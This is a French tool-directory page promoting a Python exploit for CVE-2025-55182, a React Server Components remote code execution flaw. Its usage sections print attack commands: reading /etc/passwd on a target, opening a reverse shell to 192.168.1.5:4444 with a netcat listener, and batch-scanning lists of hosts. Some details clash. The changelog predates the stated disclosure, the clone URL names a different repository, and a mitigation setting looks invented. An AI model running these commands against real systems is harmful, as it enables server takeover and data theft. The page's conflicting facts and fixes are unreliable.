Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182_liyon — Exploit basé sur Python pour CVE-2025-55182 (RCE React Server Components) avec shell interactif, shell inversé, analyse par lots et environnement vulnérable basé sur Docker pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
Scanners de VulnérabilitésGénération de PayloadsExploitationShellcodeExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming
Outil d'Accès à Distance
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

Exploit basé sur Python pour CVE-2025-55182 (RCE React Server Components) avec shell interactif, shell inversé, analyse par lots et environnement vulnérable basé sur Docker pour les tests de sécurité autorisés.

Voir le dépôt
3il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - Exécution de code à distance (RCE) dans React Server Components

⚠️ Avis juridique : Cet outil est destiné uniquement à la recherche en sécurité, aux tests d'intrusion autorisés et à des fins éducatives. Utiliser cet outil contre un système sans autorisation explicite est illégal et contraire à l'éthique.

📋 Aperçu

CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance (RCE) dans React Server Components (RSC), permettant à un attaquant non authentifié d'exécuter du code arbitraire sur le serveur via une désérialisation malveillante de JavaScript.

🎯 Détails de la vulnérabilité

AttributValeur
ID CVECVE-2025-55182
Score CVSS9,8 (Critique)
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction utilisateurAucune
ImpactÉlevé (Confidentialité, Intégrité, Disponibilité)
Composant affectéReact Server Components (RSC)
Versions affectéesReact 18.x - 19.x (builds spécifiques)
Date de divulgation3 décembre 2025
Alias CVEReact2Shell

🔍 Détails techniques

Cause racine : React Server Components désérialise incorrectement les objets JavaScript fournis par l'utilisateur lors du traitement des charges utiles RSC, permettant à un attaquant d'injecter du code malveillant exécuté sur le serveur.

Vecteur d'attaque : Charge utile RSC malveillante dans une requête HTTP Impact : Exécution de code à distance sans authentification, prise de contrôle du serveur, fuite de données

🚀 Fonctionnalités

  • ✅ Outil d'exploitation Python monofichier avec shell interactif
  • ✅ Détection automatisée de la vulnérabilité
  • ✅ Scan par lots avec multithreading
  • ✅ Environnement React vulnérable basé sur Docker
  • ✅ Prise en charge de plusieurs types de charges utiles
  • ✅ Journalisation détaillée et gestion des erreurs
  • ✅ Établissement de shell inversé
  • ✅ Encodage Base64 des charges utiles

📦 Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# Installer les dépendances
pip install -r requirements.txt

🎯 Utilisation

Démarrage rapide

root@kitploit:~
# Installer les dépendances
pip install requests

# Exécuter une commande sur la cible vulnérable
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# Mode shell interactif
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

Options avancées

root@kitploit:~
# Commande personnalisée
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# Établir un shell inversé avec IP/port personnalisé
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# Scan par lots
python exploit/batch_scanner.py -f targets.txt

# Mode verbeux
python exploit/cve_2025_55182.py -u http://target.com -v

# User-Agent personnalisé
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ Mise en place de l'environnement cible

Avec Docker (recommandé)

root@kitploit:~
cd target
docker-compose up -d

Installation manuelle

root@kitploit:~
cd target
npm install
npm run dev

Accéder à l'application vulnérable : http://localhost:3000

📊 Scénarios d'attaque

Scénario 1 : Exécution de commande

Exécuter une seule commande sur le serveur vulnérable :

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

Sortie attendue :

root@kitploit:~
[+] Détection de la vulnérabilité réussie : RCE React Server Components
[+] Commande exécutée : id
[+] Réponse :
uid=0(root) gid=0(root) groups=0(root)

Scénario 2 : Shell interactif

Obtenir un shell interactif sur le serveur vulnérable :

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

Fonctionnalités :

  • Auto-complétion par Tab
  • Historique des commandes
  • Sessions shell multiples
  • Téléchargement / envoi de fichiers

Scénario 3 : Shell inversé

Établir une connexion de shell inversé :

root@kitploit:~
# Sur la machine de l'attaquant
nc -lvnp 4444

# Exécuter l'outil d'exploitation
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

Scénario 4 : Scan par lots

Scanner plusieurs cibles pour la vulnérabilité :

root@kitploit:~
# Créer un fichier de cibles
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# Exécuter le scanner par lots
python exploit/batch_scanner.py -f targets.txt

🛡️ Atténuation et défense

Actions immédiates

  1. Mettre à jour React

    root@kitploit:~
    npm install react@latest
    # Mettre à jour vers la version corrigée
    
  2. Bloquer les requêtes RSC

    root@kitploit:~
    // Désactiver temporairement RSC
    const config = {
      enableRSC: false
    }
    
  3. Règles WAF

    • Bloquer les requêtes contenant des motifs RSC
    • Surveiller les charges utiles JavaScript suspectes
    • Imposer une limitation de débit sur les endpoints RSC

Corrections à long terme

  • Implémenter la validation d'entrée des charges utiles RSC
  • Utiliser une exécution JavaScript en bac à sable
  • Audits de sécurité réguliers
  • Surveiller les accès RSC non autorisés

📚 Documentation

  • Analyse de la vulnérabilité - Analyse technique approfondie
  • Guide d'utilisation - Instructions d'utilisation complètes
  • Défense et correction - Renforcement de la sécurité

🧪 Tests

Tests manuels

root@kitploit:~
# Mettre en place l'environnement vulnérable
cd target && docker-compose up -d

# Tester la vulnérabilité
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

Tests automatisés

root@kitploit:~
# Exécuter la suite de tests
python tests/test_exploit.py

🔬 Références de recherche

  • Entrée NVD CVE-2025-55182
  • Bulletin de sécurité React
  • Blog de recherche Wiz
  • Analyse de Project Zero

📝 Journal des modifications

v1.0.0 (2025-04-02)

  • Publication initiale
  • Exploitation RCE sur cible unique
  • Mode shell interactif
  • Prise en charge du shell inversé
  • Scan par lots
  • Environnement vulnérable Docker
  • Documentation complète

🎓 Objectif pédagogique

Cet outil démontre :

  • Comment fonctionne une vulnérabilité RCE dans React
  • Les bonnes pratiques de développement d'exploitation
  • Les méthodes d'évaluation de sécurité
  • Les principes du hacking éthique

👥 Contributeurs

  • Chercheur en sécurité - Implémentation initiale

📄 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

⚠️ Déclaration juridique et éthique

Important : Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.

Exigences légales

  • Utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez obtenu une autorisation explicite
  • Respecter toutes les lois et réglementations applicables
  • Signaler les vulnérabilités de manière responsable aux fournisseurs
  • Suivre les directives de divulgation responsable

Actions interdites

  • Accès non autorisé à des systèmes informatiques
  • Cibler des systèmes sans autorisation
  • Utiliser la vulnérabilité à des fins malveillantes
  • Divulguer ou détruire des données

Conséquences juridiques

  • Poursuites pénales pour accès non autorisé
  • Responsabilité civile pour les dommages
  • Peine d'emprisonnement potentielle
  • Conséquences professionnelles

En utilisant cet outil, vous acceptez :

  • De respecter toutes les lois locales et internationales
  • De l'utiliser uniquement pour des tests de sécurité autorisés
  • De signaler de manière responsable les vulnérabilités découvertes
  • De ne pas l'utiliser pour des activités malveillantes ou illicites

📞 Signaler une vulnérabilité

Si vous découvrez cette vulnérabilité dans des systèmes de production :

  1. Signaler au fournisseur

    • Équipe React : [email protected]
    • Suivre la divulgation responsable
  2. Attribution CVE

    • Soumettre à NIST NVD
    • Suivre le calendrier de divulgation
  3. Communauté de sécurité

    • Partager les découvertes (après correction)
    • Contribuer aux connaissances en sécurité

Rappelez-vous : La recherche en sécurité doit toujours être éthique et légale. Utilisez vos compétences pour rendre Internet plus sûr ! 🛡️

Télécharger l’outil